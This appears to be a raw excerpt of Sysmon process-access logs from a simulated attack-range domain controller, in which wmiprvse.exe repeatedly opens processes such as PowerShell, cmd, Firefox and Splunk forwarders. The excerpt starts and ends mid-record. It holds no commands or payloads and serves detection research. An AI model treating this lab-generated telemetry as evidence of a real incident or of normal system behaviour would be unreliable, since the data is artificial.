16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246845Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246844Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246843Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246842Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246841Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246840Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246839Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246838Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.488{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.487{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.487{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.486{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.485{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.484{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002246828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.484{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E21E68BA62453ACF3727FE58951D2B3,SHA256=F5C532214983D752C322ED00338A2AEBBA470DA4C44DA5A19788324967EDD859,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002246827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:58:30.483{05ADC7E1-6EB6-603E-14AB-00000000AD01}133086108C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002246826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 